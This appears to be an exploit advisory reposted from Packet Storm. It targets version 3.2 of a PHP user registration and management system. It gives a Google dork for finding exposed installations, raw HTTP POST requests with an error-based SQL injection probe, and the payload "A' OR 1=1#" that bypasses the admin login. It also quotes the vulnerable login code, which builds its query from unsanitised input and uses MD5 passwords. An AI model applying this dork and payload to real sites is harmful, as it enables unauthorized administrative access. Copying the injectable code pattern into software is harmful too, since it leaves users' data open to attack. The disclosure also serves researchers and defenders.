Share
## https://sploitus.com/exploit?id=PACKETSTORM:179147
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
.:. Exploit Title > User Registration & Management System - SQLi  
.:. Google Dorks .:.  
inurl:loginsystem/index.php  
.:. Date: June 18, 2024  
.:. Exploit Author: bRpsd  
.:. Contact: cy[at]live.no  
.:. Vendor -> https://phpgurukul.com/  
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003  
.:. Product Version -> Version 3.2  
.:. DBMS -> MySQL  
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
#############  
|DESCRIPTION|  
#############  
"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."  
===========================================================================================  
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass  
Types: error-based  
File: localhost/admin/index.php  
Vul Parameter: USERNAME [POST]  
POST PoC #1: http://tom:8080/loginsystem/admin/index.php  
Host: tom  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
Origin: http://tom  
Connection: keep-alive  
Referer: http://tom/loginsystem/admin/index.php  
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a  
Upgrade-Insecure-Requests: 1  
username='&password=test&login=  
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9  
===========================================================================================  
Test #2 => Payload to skip authentication  
http://localhost:9000/loginsystem/admin/index.php  
username=A' OR 1=1#&password=1&login=  
Response:  
302 redirect to dashboard.php  
===========================================================================================  
Vuln File:/loginsystem/admin/index.php  
Vul Code:  
<?php session_start();  
include_once('../includes/config.php');  
// Code for login  
if(isset($_POST['login']))  
{  
$adminusername=$_POST['username'];  
$pass=md5($_POST['password']);  
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");  
$num=mysqli_fetch_array($ret);  
if($num>0)